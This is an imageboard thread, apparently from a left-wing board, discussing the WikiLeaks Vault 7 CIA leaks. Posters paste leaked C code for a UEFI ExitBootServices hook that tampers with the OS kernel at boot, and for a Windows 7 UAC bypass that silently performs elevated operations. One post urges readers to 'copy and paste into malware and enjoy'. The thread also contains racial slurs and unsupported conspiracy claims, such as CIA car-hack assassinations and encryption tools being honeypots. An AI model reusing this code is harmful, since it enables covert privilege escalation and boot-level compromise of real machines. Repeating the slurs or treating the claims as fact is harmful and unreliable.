twitter.com
First thread→
twitter.com
First thread→
Other urls found in this thread:
globalresearch.ca
wikileaks.org
russia-insider.com
thebaffler.com
aboutthebsds.wordpress.com
wikileaks.org
wikileaks.org
news.com.au
abc.net.au
reuters.com
motherboard.vice.com
washingtontimes.com
en.wikipedia.org
thehill.com
twitter.com
twitter.com
bbc.com
notepad-plus-plus.org
youtube.com
youtube.com
cnet.com
twitter.com
ralphnaderradiohour.com
reddit.com
g-2.space
twitter.com
Russia was telling the truth, and America is a lying cappie shithole.
Thanks V7, we all knew this already.
Well I hope they hurry up, everyone needs to know every single thing that has been compromised by the CIA niggers.
Terry was right all along. Why didn't we listen?
In other news, Pablo Escobar's son recently confirmed that his father was a CIA employee.
Thanks for the invasive hippos in Colombia you fucks.
Even the CIA fears the Comodo.
heres another:
wikileaks.org/ciav7p1/cms/page_36896783.html
Hack the OS's kernel while in memory at the end the of UEFI boot process, immediatly before control is handed over to kernel
requires compiling as a UEFI executable and inserting into the linux /boot/UEFI directory, or onto the Windows UEFI boot partition
extern EFI_BOOT_SERVICES *gBS;EFI_EXIT_BOOT_SERVICES gOrigExitBootServices;EFI_STATUSEFIAPIExitBootServicesHook(IN EFI_HANDLE ImageHandle, IN UINTN MapKey){/* *//* Do fun hook-related stuff here *//* *//* Fix the pointer in the boot services table *//* If you don't do this, sometimes your hook method will be called repeatedly, which you don't want */gBS->ExitBootServices = gOrigExitBootServices;/* Get the memory map */UINTN MemoryMapSize;EFI_MEMORY_DESCRIPTOR *MemoryMap;UINTN LocalMapKey;UINTN DescriptorSize;UINT32 DescriptorVersion;MemoryMap = NULL;MemoryMapSize = 0;do {Status = gBS->GetMemoryMap(&MemoryMapSize, MemoryMap, &LocalMapKey, &DescriptorSize,&DescriptorVersion);if (Status == EFI_BUFFER_TOO_SMALL){MemoryMap = AllocatePool(MemoryMapSize + 1);Status = gBS->GetMemoryMap(&MemoryMapSize, MemoryMap, &LocalMapKey, &DescriptorSize,&DescriptorVersion);} else {/* Status is likely success - let the while() statement check success */}DbgPrint(L"This time through the memory map loop, status = %r\n",Status);} while (Status != EFI_SUCCESS);return gOrigExitBootServices(ImageHandle,LocalMapKey);}EFI_STATUSEFIAPIHookDriverMain(IN EFI_HANDLE ImageHandle, IN EFI_SYSTEM_TABLE *SystemTable){/* Store off the original pointer and replace it with your own */gOrigExitBootServices = gBS->ExitBootServices;gBS->ExitBootServices = ExitBootServicesHook;/* It's hooked! Return EFI_SUCCESS so your driver stays in memory */return EFI_SUCCESS;}
I just went through it and it appears to be nothing substantial sadly.
Does this one require physical access?
uno mas, senor
HRESULT CoCreateInstanceAsAdmin(HWND hwnd, REFCLSID rclsid, REFIID riid, void **ppv){BIND_OPTS3 bo;WCHAR wszCLSID[50];WCHAR wszMon[300];StringFromGUID2(rclsid, wszCLSID, sizeof(wszCLSID)/sizeof(wszCLSID[0]));HRESULT hr = StringCchPrintfW(wszMon, sizeof(wszMon)/sizeof(wszMon[0]), L"Elevation:Administrator!new:%s", wszCLSID);if (FAILED(hr))return hr;memset(&bo, 0, sizeof(bo));bo.cbStruct = sizeof(bo);bo.hwnd = hwnd;bo.dwClassContext = CLSCTX_LOCAL_SERVER;return CoGetObject(wszMon, &bo, riid, ppv);}void ElevatedDelete(){MessageBox(NULL, "DELETING", "TESTING", MB_OK);// This is only availabe on Vista and higherHRESULT hr = CoInitializeEx(NULL, COINIT_APARTMENTTHREADED | COINIT_DISABLE_OLE1DDE);IFileOperation *pfo;hr = CoCreateInstanceAsAdmin(NULL, CLSID_FileOperation, IID_PPV_ARGS(&pfo));pfo->SetOperationFlags(FOF_NO_UI);IShellItem *item = NULL;hr = SHCreateItemFromParsingName(L"C:\\WINDOWS\\TEST.DLL", NULL, IID_PPV_ARGS(&item));pfo->DeleteItem(item, NULL);pfo->PerformOperations();item->Release();pfo->Release();CoUninitialize();}
But why would they emply him?
Comodo?
nope, that attack is placed in the UEFI boot loader partition of your OS.
for linux, this goes in /boot/UEFI, for windows it goes in the UEFI partition.
Also, I forgot to explain this one:
wikileaks.org
Execute any function with administrative muh privileges on Windows 7, while bypassing the UAC permission window, which generally asks permission before executing with administrative muh privileges
this allows any code to be executed as administrator, unknown to user.
copy and paste into malware and enjoy!
I hope they patch it fast.
liberals have been seriously saying this about he leaks. i've even heard "the CIA knows what they're doing, they're the good guys–trust them! we should be focusing on RUSSIA! this i merely an attempt at distracting the masses from RUSSIA!"
I virtualized a windows 7 machine, it does indeed work as described.
whats worse, is if you read the leaked document it describes this vulnerability as """a feature"""… makes me think a patch means nothing, there will just be another """"feature"""" included for the CIA later
Linux described it as a feature? Or windows? I'm on Linux But I have a BSD laptop.
russia-insider.com
also, the leak revealed that a good bit of CIA malware was Russian-made. so, "but the hacking had Russian fingerprints!" is definitely no longer valid, as anyone from any country, including the US, could have done it.
The leaked document describe the Windows 7 muh privilege escalation vulnerability as a "Feature"
Kek. I can't believe anyone would even think windows was safe in the current year.
excerpt:
Windows 7 includes a feature that enables applications running with Admin muh privileges to perform system operations without the UAC prompt.
Was BSD and GNU HURD effected
There was a pretty good article in the Baffler about these "hacking fingerprints" which was informative. As it turns out, the link to Russia is more tenuous than even you think. thebaffler.com
Shills arguing against GNU/Linux because it was affected too… If Linux got "BTFO" we'd need to make a new term then for whatever happened to Microsoft, Apple and Google products.
...
That article you linked seems to be distorting its source. I can't find their quote about "The CIA's Remote Devices Branch's UMBRAGE group collects and maintains a substantial library of attack techniques 'stolen' from malware produced in other states including the Russian Federation." anywhere on the actual Wikileaks page.
its hard to find specific distros that were targeted with the 1% of the total leaks that have been released so far.
systemd OS's (archlinux) seems to have been a target, this is implied but not proven yet, but systemd is mentioned alot.
UMBRAGE
The CIA's Remote Devices Branch's UMBRAGE group collects and maintains a substantial library of attack techniques 'stolen' from malware produced in other states including the Russian Federation.
...
I hope systemd is directly mentioned and involved with this so every major distro drops it (I'm guessing every distro but RedHat).
I have libre boot and trisquel and I thought I was somewhat secure. Nope.
I use RedHat. (or more specifically, Qubes OS… a Type I hypervisor running a Red Hat kernel…. check it out sometime)
Ah, thanks. Still that's part of the press release. I'd like to see some sort of explicit connection made within the leaks.
Qubes OS on Runit fucking when?
...
Tails with Xen? Tails alone isn't good enough. Virtualization is the most important security paradigm now.
I run tails inside Qubes.
wikileaks.org
its implied here
excerpt:
The UMBRAGE team maintains a library of application development techniques borrowed from in-the-wild malware. The goal of this repository is to provide functional code snippets that can be rapidly combined into custom solutions
By using other countries malware, they mimic the signatures. it is less expensive to steal another countries malware than develop their own
The DNC leaks were done by an insider though. The only argument there ever was for any sort of "fingerprints" was the method used to obtain John Podesta's shitty email password.
Yes, yes yes
Qubes is like an OS that creates and destroys VM;s on the fly. you dont boot into an os that is destroyed later, every app you run is in a VM that is destroyed upon closing. Its like tails to the next level
Stallman was right
Terry was right
Assange was right
Snowden was right
The liberals probably just don't care either way tbh
Stallman has been right about software continuously and has been proven right again and again but people still don't listen to him.
...
explain
I have a poster of him on my wall and a sticker of him on my libreboot think pad X60.
HURD isn't even usable (yet).
There is a fork of arch and a fork of Debian that uses it.
Can it run on real hardware without shitting itself?
Yes. Its not very to date though. It probably has around 4 users.
comodo is an antivirus software. there is an entire branch of leaked documents on defeating antivirus software. comodo 5x is tough to defeate, but according to the document, comodo 6x is quite easy to defeat by simply executing your code within a windows process
WE MUST HAVE INDEPENDENT VERIFICATION ON ALL CLAIMS MADE BY NEWS SOURCES NO MATTER HOW RESPECTED
EXCEPT ASSANGE AND SNOWDEN, WE WILL BELIEVE ANY FANFIC THEY PUBLISH NO MATTER HOW MUCH IT MAKES THE US LOOK LIKE OMNISCIENT BEINGS
HAHA REUTERS? AP? YOU MEAN CORPORATE MEDIA, I ONLY TRUST RUSSIA TODAY, PUTIN IS MY GREATEST FRIEND, ASSAD AND DUTERTE DID NOTHING WRONG
Jesus. guys, come on now. If you didn't know bitcoin and tor and snapchat and LUKS and 8ch,net were honeypots, you were a dumbfuck to start
What
LUKs is a honeypot?
how to spot a liberal 101
None of Wikileaks' leaks or Snowden's leaks have ever been disproven.
“As of October 2014 the CIA was also looking at infecting the vehicle control systems used by modern cars and trucks,” WikiLeaks writes. “The purpose of such control is not specified, but it would permit the CIA to engage in nearly undetectable assassinations.”
Scary. Nothing beats reality, I guess.
This man would have been your best friend 60 years ago
What are you talking about? If anything McCarthy was a boon to Soviet sympathisers
He was to anticommunism what a drunk beerbellied redneck in a brownshirt outfit is to advancing fascism
According to witnesses his car drove itself into a tree after going way faster than the speedlimit and exploded.
Everyones first thought back then was his cars computer was hacked because DARPA was working on tools like this at the time. Looks like the tools were finished.
I wonder if the 7th Floor group the FBI investigators refereed to as a Shadow Government are close with the CIA and NSA…
My guess is its just a bunch of rich dudes and bankers sitting around a table commading basically everything in the USA.
Am I the only one that suspects the NSA's selling their info to advertisers?
...
damn…. the 7th floor group.
The real government within the government
No, but I suspect government agencies have trade pacts with companies like Google or Microsoft where they share information with each other.
Somehow, *somehow,* the CIA thought the NSAs TAO groups were not good enough.
"I don't mean to judge them at all, but this group of millennials and related groups simply have different understandings of the words loyalty and secrecy and transparency than certainly my generation did."
– Michael Hayden, former director of the CIA
abc.net.au
Gosh, turns out those darned millennials don't like being spied on! Traitors!
Neither has Christ been disproven as your lord and savior, nor have actual spooky ghosts been disproven.
Russians aren't socialist and haven't been even in name since 1989.
MUH IMPERIALISM THO
On the other hand truckloads of their leaks have been confirmed.
At the rate they went with the email leaks we could be at this for years
Seriously, just drop this shit. Stop edging us, Julian!
Went to check for /g/ for news about this and I just noticed how infested of Holla Forumstards that board is now. They barely talk about technology anymore, it's all about le spooky SJWs. Saw some people asking about distros and the only answers were "that distro is for cucks and full of SJWs", nothing actually related to the software itself and how good/bad it is. What the fuck?
...
kek @ that mad genius
Such a boon that the entire US worker's movement was wiped out.
So should I consider this an endorsement of said program and buy it?
Same reason they had their pilots bring coke and heroin into LA. Anticommunism.
No. Get Linux.
This is some of the most retarded shit I've read on leftypol.
washingtontimes.com
I mean it's China but interesting nonetheless
The "US worker's movement" was in decline since the New Deal user, and McCarthy rode the Red Scare, he didn't create it (the Iron Curtain, the fall of the Kuomintang government to Mao's guerillas, and the Fuchs and later Rosenberg nuclear espionage revelations did that)
en.wikipedia.org
McCarthy went down in history as a drunken paranoid tinfoiler, not as a glorious hero in the battle against world communism or whatever
Free operating systems are the *only* options for security and linux is the easiest for people with low autism levels, but be aware that you need to take some further measures than JUST Installing ubuntu.
Namely, dont use proprietary drivers, dont use proprietary software, and make sure your system has security measures like application sandboxing, mandatory access control, etc.
Its the difference between "not quite as bad as wangblows and crapple" and "significantly better than wangblows and crapple"
anyone got any juicy bits for a brainlet?
You do know that Nixon was a Mcarthyite? And that the CP and workers movements were completely crushed in the US?
Or are you retarded enough to believe that people's opinions about historical figures today actually have any effect on what they did at the time?
This is a little personal for me as many in my family were blacklisted academics who had to leave the country to find work. The red scare is what we are talking about and the HUAC played a major role, and the committee is widely associated with Mcarthy. To this day there is no real Marxist presence in academia and it has severely affected our politics. How do you think the SJW phenomenon was created? Basically by ignoring all Marxist work on intersectionality in favor of complete liberalism.
I won't lie, this made me laugh.
They can assassinate anyone at any time by remotely hacking their car. And probably have because it is so easy.
Pot, kettle, etc.
Ubuntu is easily one of the most insecure distros.
Check the viruses these pieces of shit made for fun.
you may be right
GOP senator: Assange should be in an ‘orange jumpsuit’ for life
thehill.com
R-Russian spy!!
Pence is against Wikileaks.
twitter.com
This is how you fed post, newbies.
No need for asterisks, my friend.
Good to know they're at least consistent.
Consistently retarded.
thx bro
"trafficking" implies purposely, I'm sure it's traded for money. afaik that's not Wikileaks M.O.
twitter.com
lol @ the new york times telling people the leaks are "nothing to be alarmed about"
The highlighted part is correct, but the truth is even worse; the OS themselves are compromised.
FUCKING CLOSED SOURCE SHILLS AHHHHHH
Hmm…
LOL
To be fair, this is all shit we should have already known was happening. No shit the CIA can hack everything.
I'm more interested in the tools and vulnerabilities themselves.
I love how quick these cocksuckers were to return to the old hatred for leakers. They only sung a new tune briefly because of the exposure of Hillary and the DNC.
WHY CANT SOMEONE JUST MAKE A SUPER SECURE OS FOR BROWSING THE INTERNET AND PIRATING SHIT?!
In what ways?
Wikileaks is offering tech firms CIA files first
Technology firms will get "exclusive access" to details of the CIA's cyber-warfare programme, Wikileaks has said.
bbc.com
Bit shit tbqh
...
Why not fucking make it public so everyone can defend themselves? How will Linux distros even know of their vulnerabilities this way? It feels like Assange hates governments but loves sucking porky's cock.
wtf is wrong with these people.
how is this an actual agency?
People aren't allowed to enjoy their jobs? Sounds awfully capitalist of you user.
I can't tell if you're on some new level of undetectable internet sarcasm or are serious.
Soldiers have a right to shooting sand niggers for fun too.
...
heh
...
v 7.3.3 - Fix CIA Hacking Notepad++ Issue
notepad-plus-plus.org
Notepad++ was pretty nice while I was on it, but I'm glad I moved on to Mousepad.
Wikileaks live press conference yesterday in case you missed it. Unless this was somehow prerecorded and staged, it looks like Julian Assange is alive after all.
...
Here's a synced version
youtube.com
Apparently they are going to let the public know as well.
Please elaborate?
O…kay, but how exactly will this thing going to be placed in the ESP if nobody puts it there or if I don't click anything suspicious that might magically deliver this gift on my ESP?
Former CIA director Petraeus says US spies have damaged their relationship with Silicon Valley again
cnet.com
Yeah I'm sure companies like Apple and Microsoft weren't in the know way before the leaks.
wow ron paul is still a thing. i wonder if he'd have any problem with all the spying big companies already do on everyone
twitter.com
Like when he filed a complaint to a United Nations agency to seize ronpaul.com? LOL
Is the joke here that Stallman is autistic or something?
Silicon Valley should burn too.
Or when he defended intervention in Latin America? Whew.
So Richard Stallman was on the Ralph Nader Radio Hour today. I haven't had the chance to listen to it yet but I'm going to guess this is his first opportunity to say "I told you so" about these CIA leaks.
ralphnaderradiohour.com
Wikileaks openly distributes some 'forged' leaks, though, and it's not actually clear how they determine the legitimacy of the ones they leak as legit.
That said, I support 'em on Vault 7 and am not even slightly surprised.
What do you mean by this and do you have any examples?
reddit.com
I found this on r/wikileaks: g-2.space
Though I am code/java/whatever illiterate. It's claiming to be further proof that Guccifer 2.0 isn't Russian & that this was a false flagging, which most of us here already heavily suspected.
Can someone elaborate? It seems to explain a bit, but I'd like to have someone well versed in this stuff speak on it. Would be great to link to when interacting with gung-ho liberals.
I liked Jeffrey Carr's reporting back when the story broke. He was saying similar things.
https:[email protected]/* *//the-dnc-breach-and-the-hijacking-of-common-sense-20e89dacfc2b
https:[email protected]/* */[email protected]/* */8si
You forgot your Fed flag, "user". You're talking completely out of your ass. There are also keys on each document specifically to debunk what you're saying. Whether you're saying this knowing it's bullshit or not, you should probably still kill yourself.
Guccifer 2.0 never claimed to be Russian in the first place. And the first Guccifer was definitely Romanian.
My bad, I worded that wrong. Meant to say that Guccifer 2.0 isn't "Russia". The DNC, Obama admin claims these leaks were done by the Russians.
Not making it public looks like a sensible strategy, especially if this is only a temporary thing. How am I as a normal user supposed to patch facebook or whatever? Making the vulnerabilities instantly public doesn't sound like a great idea, short-term effect would be other agencies and scammers getting clues how to do what the CIA is doing. It also is a small chance to keep the CIA somewhat in the dark for a bit about how much information Wikileaks has about them.
But you already know that, don't you :^)
The assignment to Russia comes from a private cybersecurity firm called Cloudstrike. The US government never actually investigated the DNC server themselves, as if they could have come to better conclusion once the assertion was in place. Yasha Levine has a good write up about it here thebaffler.com
The idea that Guccifer was Russian was never founded on anything more than the hack apparently using a Russian language VPN and with a timezone setting that overlaps with Moscow. That's the light blue region on the map. The DNC paid a private company to tell them Russia hacked them, basically.
...
How the fuck does that work in China? Gotta be really fucking difficult in the western border provinces.
Northern Territory and South Australia is even zanier.
OpenBSD is good.
QubesOS runs everythin in hypervisor, so everything is basically sandboxed securely.